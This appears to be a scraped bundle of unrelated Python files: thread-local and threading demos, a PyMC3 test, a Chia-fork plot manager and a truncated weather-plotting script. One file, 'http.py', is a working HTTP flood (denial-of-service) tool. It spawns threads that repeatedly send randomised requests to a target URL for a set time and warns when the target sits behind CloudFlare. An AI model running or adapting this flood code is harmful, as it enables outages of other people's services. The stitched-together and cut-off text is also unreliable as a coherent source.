# flask = werkzeug(接受请求) + jinja2(模板) + sqlalchemy(数据库)
from werkzeug.local import Local
local = threading.local()
local.a = 10
l = Local()
def aa(i) :
# 子线程
#local.a = 20
l.request = i
bb()
def bb() :
print(l.request)
#print("子线程" + str(local.a))
if __name__ == '__main__':
for item in range(10):
t = threading.Thread(target=aa,args=(item,))
t.start()
t.join() # 阻塞当前线程,让t执行完继续执行
|
test_modelcontext.py
|
# Copyright 2020 The PyMC Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from pytest import raises
from pymc3 import Model, Normal
from pymc3.distributions.distribution import _DrawValuesContext, _DrawValuesContextBlocker
from pymc3.model import modelcontext
class TestModelContext:
def test_thread_safety(self):
"""Regression test for issue #1552: Thread safety of model context manager
This test creates two threads that attempt to construct two
unrelated models at the same time.
For repeatable testing, the two threads are syncronised such
that thread A enters the context manager first, then B,
then A attempts to declare a variable while B is still in the context manager.
"""
aInCtxt, bInCtxt, aDone = [threading.Event() for _ in range(3)]
modelA = Model()
modelB = Model()
def make_model_a():
with modelA:
aInCtxt.set()
bInCtxt.wait()
Normal("a", 0, 1)
aDone.set()
def make_model_b():
aInCtxt.wait()
with modelB:
bInCtxt.set()
aDone.wait()
Normal("b", 0, 1)
threadA = threading.Thread(target=make_model_a)
threadB = threading.Thread(target=make_model_b)
threadA.start()
threadB.start()
threadA.join()
threadB.join()
# now let's see which model got which variable
# previous to #1555, the variables would be swapped:
# - B enters it's model context after A, but before a is declared -> a goes into B
# - A leaves it's model context before B attempts to declare b. A's context manager
# takes B from the stack, such that b ends up in model A
assert (
list(modelA.named_vars),
list(modelB.named_vars),
) == (["a"], ["b"])
def test_mixed_contexts():
modelA = Model()
modelB = Model()
with raises((ValueError, TypeError)):
modelcontext(None)
with modelA:
with modelB:
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
dvc = _DrawValuesContext()
with dvc:
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert _DrawValuesContext.get_context() == dvc
dvcb = _DrawValuesContextBlocker()
with dvcb:
assert _DrawValuesContext.get_context() == dvcb
assert _DrawValuesContextBlocker.get_context() == dvcb
assert _DrawValuesContext.get_context() == dvc
assert _DrawValuesContextBlocker.get_context() is dvc
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert _DrawValuesContext.get_context(error_if_none=False) is None
with raises(TypeError):
_DrawValuesContext.get_context()
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert Model.get_context() == modelA
assert modelcontext(None) == modelA
assert Model.get_context(error_if_none=False) is None
with raises(TypeError):
Model.get_context(error_if_none=True)
with raises((ValueError, TypeError)):
modelcontext(None)
|
iterators.py
|
"""Various helpful iterators"""
from queue import Empty, Queue
from threading import Thread
class IteratorWithAggregation:
"""
An iterable over an iterable which also makes an aggregate of the values available asap
It iterates over the iterable in a separate thread.
A use case is a generator which collects information about resources,
which might be relatively fast but still take time. While we are iterating over it,
we could perform other operations on yielded records, but we would also like to have access to
the "summary" object as soon as that iterator completes but while we might still be
iterating over items in the outside loop.
Use case: iterate over remote resource for downloads, and get "Total" size/number as
soon as it becomes known inside the underlying iterator.
TODO: probably could be more elegant etc if implemented via async/coroutines.
Attributes
----------
.total:
Aggregated value as known to the moment. None if nothing was aggregated.
It is a final value if `finished` is True.
.finished: bool
Set to True upon completion of iteration
.exc: BaseException or None
If not None -- the exception which was raised
Example
-------
Very simplistic example, since typically (not range) it would be taking some time to
iterate for the nested iteration::
it = IteratorWithAggregation(range(3), lambda v, t=0: v+t)
for v in it:
print(it.total, it.finished, v)
sleep(0.02) # doing smth heavy, but we would know .total as soon as it is known
would produce (so 3 is known right away, again since it is just range)
3 True 0
3 True 1
3 True 2
"""
def __init__(self, gen, agg, reraise_immediately=False):
"""
Parameters
----------
gen: iterable
Generator (but could be any iterable, but it would not make much sense)
to yield from
agg: callable
A callable with two args: new_value[, total=None] which should return adjusted
total. Upon first iteration, no prior `total` is provided
reraise_immediately: bool, optional
If True, it would stop yielding values as soon as it detects that some
exception has occurred (although there might still be values in the queue to be yielded
which were collected before the exception was raised)
"""
self.gen = gen
self.agg = agg
self.reraise_immediately = reraise_immediately
self.total = None
self.finished = None
self._exc = None
def __iter__(self):
self.finished = False
self._exc = None
queue = Queue()
def worker():
"""That is the one which interrogates gen and places total
into queue_total upon completion"""
total = None
try:
for value in self.gen:
queue.put(value)
self.total = total = (
self.agg(value, total) if total is not None else self.agg(value)
)
except BaseException as e:
self._exc = e
finally:
self.finished = True
t = Thread(target=worker)
t.start()
# yield from the queue (.total and .finished could be accessed meanwhile)
while True:
if self.reraise_immediately and self._exc is not None:
break
# race condition HERE between checking for self.finished and
if self.finished and queue.empty():
break
# in general queue should not be empty, but if it is, e.g. due to race
# condition with above check
try:
yield queue.get(timeout=0.001)
except Empty:
continue
t.join()
if self._exc is not None:
raise self._exc
|
scalene_sigqueue.py
|
import queue
import threading
class ScaleneSigQueue:
def __init__(self, process):
self.queue = queue.SimpleQueue()
self.process = process
self.thread = None
self.lock = threading.RLock() # held while processing an item
def put(self, item):
self.queue.put(item)
def get(self):
return self.queue.get()
def start(self):
# We use a daemon thread to defensively avoid hanging if we never join with it
if not self.thread:
self.thread = threading.Thread(target=self.run, daemon=True)
self.thread.start()
def stop(self):
if self.thread:
self.queue.put(None)
# We need to join all threads before a fork() to avoid an inconsistent
# state, locked mutexes, etc.
self.thread.join()
self.thread = None
def run(self):
while True:
item = self.queue.get()
if item == None: # None == stop request
break
with self.lock:
self.process(*item)
|
http.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from stai.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from stai.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from stai.util.generator_tools import list_to_batches
from stai.util.ints import uint16
from stai.util.path import mkdir
from stai.util.streamable import Streamable, streamable
from stai.types.blockchain_format.proof_of_space import ProofOfSpace
from stai.types.blockchain_format.sized_bytes import bytes32
from stai.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def reset(self):
with self:
self.last_refresh_time = time.time()
self.plots.clear()
self.plot_filename_paths.clear()
self.failed_to_open_filenames.clear()
self.no_key_filenames.clear()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
try:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
for path in list(self.failed_to_open_filenames.keys()):
if path not in plot_paths:
del self.failed_to_open_filenames[path]
for path in self.no_key_filenames.copy():
if path not in plot_paths:
self.no_key_filenames.remove(path)
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if loaded_plot not in plot_paths:
filenames_to_remove.append(plot_filename)
with self:
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed.append(loaded_plot)
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
loaded_plot = Path(path) / Path(plot_filename)
if loaded_plot not in plot_paths:
paths_to_remove.append(path)
total_result.removed.append(loaded_plot)
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
f"total_result.removed {len(total_result.removed)}, "
f"total_duration {total_result.duration:.2f} seconds"
)
except Exception as e:
log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
self.reset()
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
# If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
# the current plot from that list if its in there since we passed the key checks above.
if file_path in self.no_key_filenames:
self.no_key_filenames.remove(file_path)
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded.append(new_plot_info)
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {len(result.loaded)}, "
f"removed {len(result.removed)}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
plot_from_pp_geop_height_aind_Rain_by_day_18Aug.py
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'rain_mean_by_day'
pp_file_contour ='408'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
min_contour = 0
max_contour = 3
tick_interval=0.3
clevs = np.linspace(min_contour, max_contour,64)
cmap=cm.s3pcpn_l
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = 660.
clev_max = 810.
elif p_level == 850:
clev_min = 1435.
clev_max = 1530.
elif p_level == 700:
clev_min = 3090.
clev_max = 3155.
elif p_level == 500:
clev_min = 5800.
clev_max = 5890.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = 300.
clevpt_max = 312.
elif p_level == 850:
clevpt_min = 302.
clevpt_max = 310.
elif p_level == 700:
clevpt_min = 312.
clevpt_max = 320.
elif p_level == 500:
clevpt_min = 325.
clevpt_max = 332.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = 0.012
clevsh_max = 0.020
elif p_level == 850:
clevsh_min = 0.007
clevsh_max = 0.017
elif p_level == 700:
clevsh_min = 0.002
clevsh_max = 0.010
elif p_level == 500:
clevsh_min = 0.001
clevsh_max = 0.005
else:
print 'Specific humidity min/max not set for this pressure level'
#clevs_col = np.arange(clev_min, clev_max)
clevs_lin = np.arange(clev_min, clev_max, 5)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s.pp' % (expmin1, experiment_id, pp_file_contourf)
#pc = iris(pfile)
pcube_contourf = iris.load_cube(pfile)
pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
height_pp_file = '%s_%s_on_p_levs_mean_by_day.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
time_coords = pcube_contourf.coord('time')
#Add_hour_of_day(pcube, pcube.coord('time'))
#add_hour_of_day(height_cube, height_cube.coord('time'))
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
pcube_contourf = pcube_contourf.extract(iris.Constraint(day_of_year=230))
#pdb.set_trace()
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
#pdb.set_trace()
# Get time of averagesfor plot title
h = u.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_utc = u.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
h_local = h_utc.astimezone(to_zone).strftime('%H%M')
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
# #pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
# if plot_diag=='temp':
# min_contour = clevpt_min
# max_contour = clevpt_max
# cb_label='K'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=2
# clev_number=max_contour-min_contour+1
# elif plot_diag=='sp_hum':
# min_contour = clevsh_min
# max_contour = clevsh_max
# cb_label='kg/kg'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=0.002
# clev_number=max_contour-min_contour+0.001
# clevs = np.linspace(min_contour, max_contour, clev_number)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
cs_lin = iplt.contour(height_cube_slice, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
# cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
# cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# #cbar.set_label(time_cube.units, fontsize=10, color='#262626')
# cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
# ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
